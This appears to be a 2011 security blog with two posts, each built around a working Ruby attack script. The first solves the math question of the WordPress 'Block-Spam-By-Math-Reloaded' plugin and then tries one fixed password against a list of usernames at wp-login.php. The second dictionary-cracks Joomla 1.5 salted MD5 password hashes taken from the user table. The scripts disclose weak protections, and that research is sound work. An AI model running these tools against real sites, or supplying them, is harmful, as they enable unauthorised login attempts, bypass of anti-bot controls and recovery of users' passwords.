Friday, August 19, 2011

WordPress "Block-Spam-By-Math-Reloaded" plugin bypass



"Plugin description: This plugin protects your Wordpress 3.x login, comments, and new user/new blog signup process against spambots with a simple math question."

- http://plugins.svn.wordpress.org/block-spam-by-math-reloaded/trunk/block-spam-by-math-reloaded.php

However this simple math question is very simple and can be easily bypassed. The plugin generates two random numbers between 2 and 15 and asks the user to enter their sum.


The script below is a PoC of how to bypass the plugin in the wp-login.php page.

#!/usr/bin/env ruby

require 'uri'
require 'net/http'
require 'cgi'

# Request Config
base_url = "http://[TAGERT]/wp-login.php"

# Proxy Config
use_proxy = true
proxy_address = '127.0.0.1'
proxy_port = '8080'

# Headers config
useragent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1'
cookie = '[PASTE_THE_COOKIE_HERE]'
headers = {
'Host' => URI.parse(base_url).host,
'Content-Type' => 'application/x-www-form-urlencoded',
'User-Agent' => useragent,
'Cookie' => cookie
}

# do request
def built_request(url,use_proxy,proxy_address,proxy_port)
if (use_proxy)
http = Net::HTTP.new(url.host,url.port,proxy_address,proxy_port)
return http
else
http = Net::HTTP.new(url.host,url.port)
return http
end
end

def smartaleck(values)
answer = 0
values.each { |a| answer+=a.to_i }
return answer
end

def getvalues(response)
i = 0
values = []
while (i <= 1) do
response.body.match(%r{.?(mathvalue#{i}).*(value=).([\d]+)})
values[i] = $3
i += 1
end
return values
end

# base request
url = URI.parse(base_url)
$http = built_request(url,use_proxy,proxy_address,proxy_port)
resp = $http.request_get(url.path)

v = getvalues(resp)
$sec_answer = smartaleck(v)
puts "#{v[0]} + #{v[1]} = #{$sec_answer}"

# File contains one user per line
users = File.open('files/user.txt','r')

# Fixed password
pass = '123456'

users.each do |user|
begin
payload = "log=#{user.chomp}&pwd=#{pass}&mathvalue2=#{$sec_answer}&mathvalue0=#{v[0]}&mathvalue1=#{v[1]}&wp-submit=Log+In&redirect_to=#{CGI::escape("http://"+url.host+"/wp-admin/")}&testcookie=1"
resp = $http.request_post(url.path, payload, headers)
v = getvalues(resp)
$sec_answer = smartaleck(v)
puts "#{v[0]} + #{v[1]} = #{$sec_answer}"
rescue Timeout::Error
puts "Time out"
sleep(0.5)
next
end
end

users.close


I believe the good and old captacha, well implemented, yet is a better solution for these cases.


Tuesday, August 2, 2011

Simple Joomla Password "Cracker"

Joomla uses a simple MD5 Cryptographic hash function to create and store users passwords. For Security resons, one of the inputs for this function is a random salt. However, this salt is stored in the jos_user (by default) table, together with the generated hash.

Once in possession of this information it is possible to perform a dictionary attack against these hashes using a simple ruby script to get users password.

The first parameter is the dictionary file and the second is the hash file in the following format: user;hash;salt

Tested on Joomla Version 1.5.23


#!/usr/bin/env ruby
require 'digest/md5'


def JoomlaCrack(key, hash, salt)

if (generateJoomlaHash(key,salt) == hash)
return true
else
return false
end

end


def generateJoomlaHash(pKey,pSalt)
return Digest::MD5.hexdigest(pKey + pSalt);
end

def run(fDic,fHash)
begin
founds = Hash.new()
fDic.each do |key|
File.open(fHash,'r').each do |line|
name,hash,salt = line.split(';')
name.to_s.chomp!
hash.to_s.chomp!
salt.to_s.chomp!
key.to_s.chomp!
if founds.include?(name)
next
else
if JoomlaCrack(key, hash, salt)
puts "#{name}:#{key}"
founds[name] = key
next
else
next
end
end
end
end
fDic.close
# puts founds.inspect
end
end


fDic = File.open(ARGV[0],'r')
fHash = ARGV[1]

run(fDic,fHash)